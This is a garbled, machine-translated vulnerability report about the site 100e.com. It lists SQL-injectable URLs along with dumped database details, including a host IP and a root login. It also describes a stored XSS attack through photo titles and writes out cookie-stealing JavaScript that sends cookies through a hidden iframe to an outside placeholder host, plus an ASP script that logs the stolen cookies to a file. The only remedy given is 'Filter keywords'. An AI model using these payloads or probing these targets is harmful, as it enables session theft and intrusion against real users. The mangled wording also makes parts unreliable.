100e inject one XSS

Pseudo-static injection is directly lost in Havjj




Http://xyz.edudemo.100e.com/paperdetail.aspx? Id = 1075 http://www.100e.com/tool/book/add/Book.aspx? Id = 3152 all injection exists, all are root. Proof: Target: http://www.100e.com/tool/book/add/Book.aspx? Id = 3152 Host IP: 210.51.18.195Web Server: Microsoft-IIS/6.0Powered-by: ASP. NETDB Server: MySQL error basedResp. time (avg): 306 msCurrent User: reader@210.51.18.195Sql Version: 5.1.41-logCurrent DB: 100 eDBSystem User: reader@210.51.18.195Host Name: localhost. localdomainInstallation dir:/usr/local/mysql/DB User & Pass: root: localhost


Http://www.100e.com/enter the home page can trigger XSS test can silently steal the cookie, it should also be able to melt insects, said no try

Use: in personal management, select to upload a photo, and then write XSS code as the title of the photo. In this test, the cookie JS Code var str = escape (window. location. pathname); cv = escape (document. cookie); function f () {ifm = document. createElement ("IFRAME"); document. body. appendChild (ifm); ifm. width = 0; ifm. height = 0; ifm. src = "http://www.xxxx.com/1.asp? S = "+ str +" | "+ cv;} setTimeout (f," 1000 "); ASP code <% s = request (" s ") if s <> "" thenset fso = Server. createObject ("Scripting. fileSystemObject ") with fso. opentextfile (server. mappath ("1.txt"), 8, true ). writeline s. closeEnd withend if %> after the trigger, 1.txt will be generated in the current directory, and the cookie to be intercepted will be put in, and then write in the photo title <script src = http://xxxxxxxxx.com/1.js> Save then open the home page photo file
Solution:

Filter keywords